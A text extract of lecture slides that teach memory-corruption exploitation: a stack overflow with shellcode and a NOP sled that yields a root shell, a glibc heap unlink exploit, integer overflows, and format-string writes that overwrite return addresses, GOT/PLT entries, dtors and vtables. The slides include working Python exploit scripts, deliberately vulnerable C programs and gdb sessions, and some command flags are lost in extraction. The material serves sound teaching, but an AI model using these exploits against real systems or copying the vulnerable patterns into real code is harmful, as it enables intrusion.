Let's do the latter for this exploit?
How to find the address of the argument buffer?
Could calculate it statically
But, it's faster to debug and pull out the addresses
Locating the Shellcode
> gcc ggdb -O0 -fPIC -fPIE -fno-stack-protector -z execstack -o vuln vuln.c
> nasm f bin o payload.bin payload.asm
> nasm f bin o decoder.bin decoder.asm
> ./xor payload.bin 256 > payload.enc
> cat decoder.bin payload.enc > exploit
> gdb vuln
(gdb) b main
Breakpoint 1 at 0x4005d4
(gdb) r "$(cat exploit)"
[repeat below to step to strcpy call]
(gdb) si
0x400611 in main()
1: x/i $rip
=> 0x400611 <main+65>: call 0x4004c0 <strcpy@plt>
(gdb) si
[use finish to immediately return from strcpy]
(gdb) fin
(gdb) p/x $rax
$1 = 0x7fffffffe640
Locating the Saved IP
(gdb) x/2xg $rbp
0x7fffffffe750: 0x0000000000000000 0x00007ffff7a54b05
(gdb) p/x 0x7fffffffe758 - 0x7fffffffe640
$2 = 0x118

We know that rbp + 8 is the address of the saved IP (why?)


Computing the difference between the saved Ip and the buffer
address gives us the maximum size of our input before we overwrite
the saved IP (here, 0x118)
Locating the Shellcode
(gdb) x/x $rbp - 0x10
0x7fffffffe740: 0x00007fffffffe838
(gdb) x/2xg 0x00007fffffffe838
0x7fffffffe838: 0x00007fffffffeaca 0x00007fffffffeaff
(gdb) x/s 0x00007fffffffeaca
0x7fffffffeaca: [...]/stack/vuln
(gdb) x/8xb 0x00007fffffffeaff
0x7fffffffeaff: 0x48 0x31 0xc0 0x48 0x89 0xc1 0xb1 0x08

In our build, argv is stored in [rbp-0x10]


Chasing pointers, we find argv[0] and argv[1]
We now know enough to build our final payload
Constructing an Exploit
NOP Sleds
Our input will consist of a NOP sled, the payload, and the address of the
argv copy of our payload
NOP sleds are used to pad out exploits
Composed of instruction sequences that don't affect proper execution
of the attack
Classically the NOP instruction (0x90), but not restricted to that
Why are the called sleds?
Execution slides down the NOPs into your payload
Overwritten return address can be less precise, so long as we land
somewhere in the NOP sled
Constructing an Exploit
import sys, struct

buf_len = 0x118
ret_addr = 0x7fffffffea60
payload = open('exploit').read()
buf = ('\x90' * (buf_len - len(payload))) \
+ payload + struct.pack('<Q', ret_addr)
sys.stdout.write(buf)
Finally
> gdb vuln
(gdb) r $(./exploit.py)
Starting program: [...]/stack/vuln $(./exploit.py)
????????????????????????????????????????????????????[...]
process 62743 is executing new program: /usr/bin/bash
warning: Could not load shared library symbols for linux-vdso.so.1.
Do you need set solib-search-path or set sysroot?
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),
[...]
Smashing the Heap
Heap Data Structures
Exploit Construction
Heap-based Overflows
The stack isn't the only target for overflows
The heap is also a popular exploitation target
Completely different beast than stack-based overflows
Much more difficult due to (usually) non-deterministic shape of
heap
Many different types of heap overflows
We'll examine one prominent example
Heaps
char* buf = malloc(1024);
// ...
free(buf);

The heap is used to store dynamically allocated data


Managed using the malloc and free family of functions
Heap managers request memory from the kernel via *brk, mmap
Many different heap implementations
Heaps
Implementation Platform

ptmalloc2 Linux, HURD (glibc)

SysV AT&T IRIX, SunOS

Yorktown AIX

RtlHeap Windows

tcmalloc Google and others

jemalloc FreeBSD, NetBSD, Mozilla

phkmalloc *BSD
ptmalloc
Extremely popular malloc (default in glibc)
Stores memory management metadata inline with user data
Stored as small chunks before and after user chunks
(Where have we seen a scheme like this before?)
Aggressive optimizations
Maintains lists of free chunks binned by size
Merges consecutive free chunks to avoid fragmentation
Heap-based Overflows
First demonstrated by Solar Designer in 2000
JPEG COM marker processing vulnerability in Netscape
Proposed a generic way to exploit heap-based overflows
Idea: Attack the memory manager itself, taking advantage of
mixed data and control information
Generic since all programs on a platform usually use the default
system allocator
Heap Layout
The heap is divided into
contiguous memory chunks
Chunks either allocated (in
use by user) or free for
allocation
Bordered by the wilderness
Each chunk can be split and
combined as needed
No two free chunks can be
adjacent
Control Blocks
struct malloc_chunk {
size_t prev_size;
size_t size;
struct malloc_chunk* fd;
struct malloc_chunk* bk;
}

Each chunk starts with a control block, or boundary tag


Holds chunk management information
16 or 32 bytes, depending on architecture
But, allocated chunks only have half that overhead
Control Blocks
struct malloc_chunk {
size_t prev_size;
size_t size;
struct malloc_chunk* fd;
struct malloc_chunk* bk;
}

prev_size
If the previous chunk is free, contains its size
Otherwise, holds user data of the previous chunk
Control Blocks
struct malloc_chunk {
size_t prev_size;
size_t size;
struct malloc_chunk* fd;
struct malloc_chunk* bk;
}

size
Equals the requested memory + sizeof(size) rounded up the next
multiple of 8
3 LSBs are always free and used for status bits
e.g., PREV_INUSE, IS_MMAPPED
Control Blocks
struct malloc_chunk {
size_t prev_size;
size_t size;
struct malloc_chunk* fd;
struct malloc_chunk* bk;
}

fd, bk
Pointers used to link free chunks into double-linked lists
Otherwise, contain user data
Allocated Chunk
Free Chunk
Contiguous Chunks
Memory Allocation
Free chunks are maintained in bins
Double-linked list of chunks
Bins organized by size
Allocation
Bins scanned in increasing order
Return a chunk of exact size, or split a larger one
Deallocation
If chunk borders the wilderness, it is consolidated
If adjacent chunks are free, they are consolidated
Consolidation removes old chunks and reinserts a larger merged chunk
List Handling
#define unlink(P, BK, FD)

When chunks are inserted or removed, their forward and back


pointers must be updated
frontlink for inserting chunks
Inlined in latest glibc
unlink for removing chunks
Removes entry P using its pointers FD and BK
unlink
#define unlink(P, BK, FD) { \
BK = P->bk; \
FD = P->fd; \
FD->bk = BK; \
BK->fd = FD; \
}
unlink
#define unlink(P, BK, FD) { \
BK = P->bk; \
FD = P->fd; \
FD->bk = BK; \
BK->fd = FD; \
}
unlink
#define unlink(P, BK, FD) { \
BK = P->bk; \
FD = P->fd; \
FD->bk = BK; \
BK->fd = FD; \
}
unlink
#define unlink(P, BK, FD) { \
BK = P->bk; \
FD = P->fd; \
FD->bk = BK; \
BK->fd = FD; \
}
unlink Exploits
BK = P->bk;
FD = P->fd;
FD->bk = BK; // *(P->fd + 24) = P->bk;
BK->fd = FD; // *(P->bk + 16) = P->fd;

If the attacker can control the chunk header, he can overwrite an


arbitrary memory location with an arbitrary value
For instance, overwrite a saved IP on the stack
Many other possibilities, as we'll see
Basic Exploit Scenario
1. Vulnerable program allocates two adjacent chunks X, Y
2. Attacker overflows X, creates two fake free chunks W, Z over Y
3. When X is freed, it is merged with W and unlink is called
4. Since W and Z are controlled by the attacker, the attacker controls
their fd and bk pointers
unlink Exploit
1. Attacker drives vulnerable
program to allocate two
adjacent chunks X and Y
unlink Exploit
1. Attacker drives vulnerable
program to allocate two
adjacent chunks X and Y
2. free(X)
3. W is examined and Z is found
using W + W->size
4. unlink(W, fd_W, bk_W)
*(fd_W + 24) = bk_W
*(bk_W + 16) = fd_W
Composing the Buffer
1. Find the address (ADDR) to overwrite with value (VALUE)
2. First 16 bytes of chunk X overwritten by unlink
3. Following two bytes jump forward e.g., jmp 32
4. Following 24 bytes modified by unlink, frontlink
5. Then, NOP sled and payload
6. Then, fake chunk with fd = ADDR - 24, bk = VALUE
7. Second fake chunk with PREV_INUSE unset
Vulnerable Program
int RecvMsg(int sk) {
MsgHdr hdr;
memset(&hdr, 0, sizeof(hdr));
read(sk, &hdr.len_, 2);
read(sk, &hdr.opts_len_, 2);
char* msg = reinterpret_cast<char*>(malloc(hdr.len_));
char* msg_opts = reinterpret_cast<char*>(malloc(hdr.opts_len_));

char* ptr = msg;


while (1) {
char c;
auto n = read(sk, &c, 1);
if (n < 1 || c == '\n')
break;
*ptr++ = c;
}

free(msg);

return 0;
}
Exploitation
Use gdb to find
1. Address of the saved IP for RecvMsg
2. Address of the msg buffer to place NOP sled and payload
Structure the chunks as in the classic unlink exploit
. Make sure to include forward jump to bypass the clobbered section
of the NOP sled
Reuse the shellcode from the stack exploit as-is
Exploitation
addr_ret_addr = 0x7fffffffe7a8
ret_addr = 0x40c040
payload = open('payload.bin').read()
chk_w =
struct.pack('<qqqq', 1, 65, addr_ret_addr - 24, ret_addr)
+ ('A' * 32)
chk_z = struct.pack( '<qqqq', 1, 65, 0, 0) + ('B' * 32)
buf = struct.pack( '<HH', 256, 256)
+ ('\x90' * 48)
+ '\xeb\x1e'
+ ('\x90' * (206 - len(payload)))
+ payload
+ chk_w
+ chk_z
+ '\n'
sys.stdout.write(buf)
Inspecting the Heap
(gdb) c
Breakpoint 2, RecvMsg(sk=0) at vuln.cpp:28
28 free(msg);
(gdb) n
(gdb) x/32xg 0x40c040
0x40c040: 0x9090909090901eeb 0x9090909090909090
0x40c050: 0x00007fffffffe790 0x9090909090909090
0x40c060: 0x9090909090909090 0x9090909090909090
[...]
0x40c0c0: 0x9090909090909090 0x9090909090909090
0x40c0d0: 0x78ec834890909090 0x00002e0d88c93148
0x40c0e0: 0x000000203d8d4800 0x4c894810247c8948
0x40c0f0: 0x4808244c89481824 0x24548d481024748d
0x40c100: 0x050f3bb0c8894808 0x0168732f6e69622f
0x40c110: 0x0000000000000001 0x0000000000000041
0x40c120: 0x00007fffffffe790 0x000000000040c040
0x40c130: 0x4141414141414141 0x4141414141414141
Comments
Exploiting the heap is more difficult than the stack
Heap layout depends on runtime behavior of the program
Depending on program inputs, chunks might or might not be
allocated in the required pattern
And, location of chunks might be unpredictable
(Problematic if payload is on the heap)
Some techniques exist to mitigate these difficulties
Allocating many chunks
Heap spraying (more later)
More Vulnerabilities
Integer Overflows
Format Strings
Function Pointers, PLT, dtors, vtables
More Vulnerabilities
The stack and the heap are classic exploitation targets, but by no
means the only ones
In this section, we'll cover some more major classes
Integer overflows
Format strings
Function pointers
Integer Overflows
Class of bugs resulting from limitations of integer presentations
Integer overflows don't directly lead to buffer overflows
But, can be used to bypass bounds checks
Can result in unintended execution paths or incorrect computations
with security implications
Integer Representation
Recall that integers are represented as fixed-width binary numbers
Arithmetic performed mod 2W
What happens when an integer is too large to represent?
Undefined behavior
Compilers can do anything they like!
In practice, overflows are ignored, and computation continues
Perhaps with incorrect results...
Integer Overflows
x = 0xffffffff;
y = 1;
r = x + y;
Width Overflows
uint32_t x = 0x10000;
uint16_t y = 1;
uint16_t z = x + y; // z = ?

Width overflows occur when assignments are made to variables that


can't store the result
Integer promotion
Computation involving two variables x, y where width(x) > width(y)
y is promoted such that width(x) = width(y)
Integer demotion
Computation truncated to width of destination
Sign Overflows
memcpy(void *, void *, unsigned
int f(char* buf, int len) {
int)
char dst_buf[64];
if (len > 64)
return 1;
memcpy(dst_buf, buf, len);
return 0;
}

Sign overflows occur when an unsigned variable is treated as signed,


or vice-versa
Can occur when mixing signed and unsigned variables in an
expression
Or, wraparound when performing arithmetic
Sign Overflows
int g(int sk, char* out, int out_len) {
char x_buf[256], y_buf[256];
unsigned int x_len, y_len;
recv(sk, &x_len, sizeof(x_len));
recv(sk, &y_len, sizeof(y_len));
int total_len = x_len + y_len;
if (total_len > out_len)
return -1;
memcpy(out, x_buf, x_len);
memcpy(out + x_len, y_buf, y_len);
return 0;
}
Format Strings
int printf(const char* format, ...);

The *printf family of functions is used to format string data


The format string controls presentation
Contains a mixture of static data and variable placeholders
Placeholders have a grammar
%<pos><flags><out-width><prec><in-width><conv>
Variables passed as additional arguments
Format Strings
Many formatting directives
%s print string data
%d print decimal number
%x print hexadecimal number
%p print a pointer
%n write the number of bytes output to the stream
If an attacker can control a format string, any location in memory can
be overwritten
All members of the printf family are vulnerable
fprintf, sprintf, etc.
Format Strings
%n directive is special
Others simply print a value from the stack
%n writes the number of bytes printed so far to an address on the
stack
Attack requirements
1. Control the number of bytes written (value to write)
2. Control the destination address
Vulnerable Program
int main(int argc, char** argv) {
char buf[256];
snprintf(buf, sizeof(buf), argv[1]);
printf("buf = %s\n", buf);
return 0;
}

> ./vuln hello


buf = hello
> ./vuln 'hello %x %x %x %x %x'
buf = hello ffffd7fc 3df6174 f7f35b46 100 80499d4
Vulnerable Program
Vulnerable Program
(gdb) r hello %x %x %x %x %x
Breakpoint 1, 0xf7d18450 in snprintf ()
(gdb) x/8xw $esp
0xffffd7dc: 0x0804869e 0xffffd800 0x00000100 0xffffdb4f
0xffffd7ec: 0xffffd7fc 0x03df6174 0xf7f35b46 0x00000100
Exploitation
(gdb)rAAAA%x%x%x%x%x%x
buf = AAAA ffffd7fc 3df6174 f7f35b46 100 80499d4 41414141

By printing up the stack, we can find a known sequence of bytes


But, so far we can only print data...
Exploitation
(gdb)rAAAA%x%x%x%x%x%n
Program received signal SIGSEGV, Segmentation fault.
0xf7d13410 in vfprintf () from /usr/lib32/libc.so.6
(gdb) x/i $eip
=> 0xf7d13410: mov DWORD PTR [eax],ecx
(gdb) p/x $eax
$1 = 0x41414141

We can use %n to write the number of bytes written so far to an


address we control
Exploitation
1. Choose the address of data to overwrite
2. Write that address to the stack
3. Find that address on the stack
Print stack using %x
Or, use gdb
4. Use %n to write data to the address
Constructing a Value
(gdb) r %032x
buf = 000000000000000000000000ffffd80c

To control the number of bytes written, we must print that number of


bytes
Padding useful to increase number
e.g., %32x prints at least 32 characters
Writing Large Values

Usually, a large value is needed


Addresses usually, well, large values
Trying to print millions of characters isn't
feasible
Solution: Write value in multiple passes
i.e., write two bytes or a byte at a time
Writes must be ordered by value, not by
address
Exploitation
Value you want to write (split in
two)
v0 = 0x1111 - 8
v1 = 0x2222 - v0 - 8 Address you want to write the
base_addr = 0xffffd7cc value to
base_off = 6
buf = struct.pack('<II', base_addr, base_addr + 2)
buf += '%0{0}x%{2}$hn%0{1}x%{3}$hn'.format(
v0,
v1,
base_off,
base_off + 1)
sys.stdout.write(buf)

$ python gen_fmt_str.py
XXXXXXXX%04361x%6$hn%08465x%7$hn

<num>$ means use parameter


<num>
Exploitation
(gdb) r $(cat input)
Breakpoint 1, 0xf7d18450 in snprintf ()
(gdb) x/xw 0xffffd7cc
0xffffd7cc: 0x0804869e
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x22221111 in ?? ()
(gdb) x/xw $esp - 4
0xffffd7cc: 0x22221111
Function Pointers
So far, we've considered several ways of hijacking function returns
Overflowing stack buffers
Tricking the heap manager using fake chunks
But, any function pointer can be used to hijack control flow
PLT entries
ctors, dtors
vtable entries
PLT
Dynamically-linked executables reference external (library) functions
But, it isn't known at link time where those functions will be
located
Procedure Linkage Table (PLT)
Along with the Global Offset Table (GOT), used to implement
runtime function resolution
External function addresses cached
PLT Entries
PLT references writable function pointers in the GOT
These pointers are prime targets for hijacking execution
Often, the PLT is conveniently mapped at a fixed address
Exploitation
1. Overwrite a PLT entry to point to attacker code
2. Drive the program execution to use the overwritten external
function address in the PLT
Function Resolution
Function Resolution
Function Resolution
PLT Entries
(gdb) si
1: x/i $eip
0x8048699: call 0x8048490 <snprintf@plt>
(gdb) si
1: x/i $eip
=> 0x8048490: jmp DWORD PTR ds:0x80499e8
(gdb) x/xw 0x80499e8
0x80499e8 <[email protected]>: 0x08048496
(gdb) si
1: x/i $eip
=> 0x8048496: push 0x10
(gdb) si
1: x/i $eip
=> 0x804849b: jmp 0x8048460
(gdb) fin
(gdb) x/xw 0x80499e8
0x80499e8 <[email protected]>: 0xf7d18450
(gdb) x/4i 0xf7d18450
0xf7d18450 <snprintf>: push ebx
0xf7d18451 <snprintf+1>: sub esp,0x18
Vulnerable Program
int main(int argc, char** argv) {
char buf[256];
snprintf(buf, sizeof(buf), argv[1]);
printf("buf = %s\n", buf);
return 0;
}

We'll use a format string exploit to overwrite the PLT entry for printf
Exploitation
(gdb) x/3i printf@plt
0x80484a0: jmp DWORD PTR ds:0x80499ec
0x80484a6: push 0x18
0x80484ab: jmp 0x8048460

We want to place the address of our payload in printf's GOT entry


Exploitation
v0 = 0x1111 - 8
v1 = 0x2222 - v0 - 8
base_addr = 0x80499ec
base_off = 6
buf = struct.pack('<II', base_addr, base_addr + 2)
buf += '%0{0}x%{2}$hn%0{1}x%{3}$hn'.format(
v0,
v1,
base_off,
base_off + 1)
sys.stdout.write(buf)
Exploitation
(gdb) r
Breakpoint 1, main (argc=2, argv=0xffffd9b4)
9 snprintf(buf, sizeof(buf), argv[1]);
(gdb) x/x 0x80499ec
0x80499ec <[email protected]>: 0x080484a6
(gdb) n
10 printf(buf = %s\n, buf);
(gdb) x/x 0x80499ec
0x80499ec <[email protected]>: 0x22221111
(gdb) n
Program received signal SIGSEGV, Segmentation fault.
0x22221111 in ?? ()
ctors, dtors
There are (more) generic pointers lying around in memory
Constructors (ctors)
Functions registered to execute prior to main
Destructors (dtors)
Functions registered to execute after main
ctors, dtors
void vuln_init(void) __attribute__((constructor));
void vuln_init(void) {
printf("starting up\n");
}

void vuln_fini(void) __attribute__((destructor));


void vuln_fini(void) {
printf("cleaning up\n");
}

int main(int argc, char** argv) {


char buf[256];
snprintf(buf, sizeof(buf), argv[1]);
printf("buf = %s\n", buf);
return 0;
}
ctors, dtors
> ./vuln blah
starting up
buf = blah
cleaning up

The compiler automatically registered our init and fini functions for
execution as constructors and destructors
Initialization and finalization are handled by the C runtime (part of
libc)
_start
_start:
xor ebp, ebp ; clear frame pointer
pop esi ; get argc
mov ecx, esp ; get argv
and esp, 0xfffffff0 ; align the stack
push eax
push esp
push edx
push 0x80487b0 ; push __libc_csu_fini
push 0x8048740 ; push __libc_csu_init
push ecx ; push argv
push esi ; push argc
push 0x80486a0 ; push main
call 0x8048470 ; call __libc_start_main
__libc_csu_init
__libc_csu_init:
; ...
.loop
mov eax, dword [esp+0x38]
mov dword [esp], ebp
mov dword [exp+0x08], eax
mov eax, dword [esp+0x34]
mov dword [esp+0x04], eax
call dword [ebx+edi*4+0x38]
add edi, 0x01
cmp edi, esi
jne .loop
; ...
ctors
(gdb) x/4xw $ebx + 0x38
0x8049acc: 0x08048610 0x08048640 0x08048530 0x00000000
(gdb) disas 0x08048610
Dump of code for function frame_dummy:
[...]
(gdb) disas 0x08048640
Dump of code for function vuln_init():
[...]
(gdb) disas 0x08048530
Dump of code for function _GLOBAL__I_a:
[...]
dtors
For an attacker, dtors are a more attractive target
Usually, ctors have already executed, so overwriting a ctor pointer
wouldn't have any effect
dtors are also stored in a vector of function pointers
Not executed by __libc_csu_fini, instead by glibc
dtors
Breakpoint 4, vuln_fini () at vuln.cpp:14
14 printf(cleaning up\n);
1: x/i $eip
=> 0x8048689: mov DWORD PTR [esp],ecx
(gdb) bt
#0 vuln_fini ()
#1 0xf7feb60c in _dl_fini ()
#2 0xf7cfc721 in __run_exit_handlers ()
#3 0xf7cfc77d in exit ()
#4 0xf7ce499b in __libc_start_main ()
#5 0x0804856f in _start ()
dl_fini
(gdb) x/8i 0xf7feb606
0xf7feb606: mov esi,eax
0xf7feb608: call DWORD PTR [edi+esi*4-0x4]
0xf7feb60c: sub esi,0x1
0xf7feb60f: jne 0xf7feb608 <_dl_fini+472>
(gdb) x/2xw $edi
0x8049ac4: 0x080485f0 0x08048670
(gdb) disas 0x080485f0
Dump of code for function __do_global_dtors_aux: [...]
(gdb) disas 0x08048670
Dump of code for function vuln_fini():
[...]
Exploitation
v0 = 0x1111 - 8
v1 = 0x2222 - v0 - 8
base_addr = 0x8049ac8
base_off = 6
buf = struct.pack('<II', base_addr, base_addr + 2)
buf += '%0{0}x%{2}$hn%0{1}x%{3}$hn'.format(
v0,
v1,
base_off,
base_off + 1)
sys.stdout.write(buf)
Exploitation
(gdb) r $(cat input)
starting up
buf = [...]
Program received signal SIGSEGV, Segmentation fault.
0x22221111 in ?? ()
1: x/i $eip
=> 0x22221111: <error: Cannot access memory at 0x22221111>
vtables
Let's look at one more example of function pointers
C++ makes heavy use of function pointers
Think virtual functions
Which method is invoked can depend on the dynamic type of an
object
As usual, the solution is indirection
Objects contain vtables, or vectors of function pointers to
implementations of virtual methods for that object
vtables
class Base {
public:
virtual ~Base(void) {
}

virtual void Speak(void) const {


std::cout << "Base reporting in\n";
}
};

class Derived : public Base {


public:
virtual void Speak(void) const {
std::cout << "Derived here\n";
}
};

int main(int argc, char** argv) {


char buf[256];
std::unique_ptr<Base> obj(new Derived());
snprintf(buf, sizeof(buf), argv[1]);
printf("buf = %s\n", buf);
obj->Speak();
return 0;
}
vtables
vtables
call 0x8048b50 ; deref unique_ptr<Base>
mov ecx, dword [eax] ; get pointer to vtable
mov ecx, dword [ecx+0x08] ; get vtable entry
mov edx, esp
mov dword [edx], eax ; set "this"
mov ebx, dword [ebp-0x0128]
call ecx ; call method
vtables
(gdb) r
0x080489c3 in main
28 obj->Speak();
1: x/i $eip
=> 0x80489c3: mov ecx,DWORD PTR [eax]
Value returned is $1 = (Base *) 0x804b008
(gdb) si
28 obj->Speak();
1: x/i $eip
=> 0x80489c5: mov ecx,DWORD PTR [ecx+0x8]
(gdb) x/4xw $ecx
0x804ac38: 0x08049130 0x08049160 0x080491a0 0x00000000
(gdb) disas 0x08049130
Dump of code for function Derived::~Derived():
[...]
(gdb) disas 0x080491a0
Dump of code for function Derived::Speak() const:
[...]
Exploitation
v0 = 0x1111 - 8
v1 = 0x2222 - v0 - 8
base_addr = 0x804ac3c
base_off = 6
buf = struct.pack('<II', base_addr, base_addr + 2)
buf += '%0{0}x%{2}$hn%0{1}x%{3}$hn'.format(
v0,
v1,
base_off,
base_off + 1)
sys.stdout.write(buf)
Exploitation
(gdb) r $(cat input)
starting up
buf = [...]
Program received signal SIGSEGV, Segmentation fault.
0x22221111 in ?? ()
1: x/i $eip
=> 0x22221111: <error: Cannot access memory at 0x22221111>
Sources

1. Many slides courtesy of Wil Robertson: https://wkr.io


2. gdb quick reference: http://www.cs.earlham.edu/~psg/tutorials/gdb_quickref.pdf

You might also like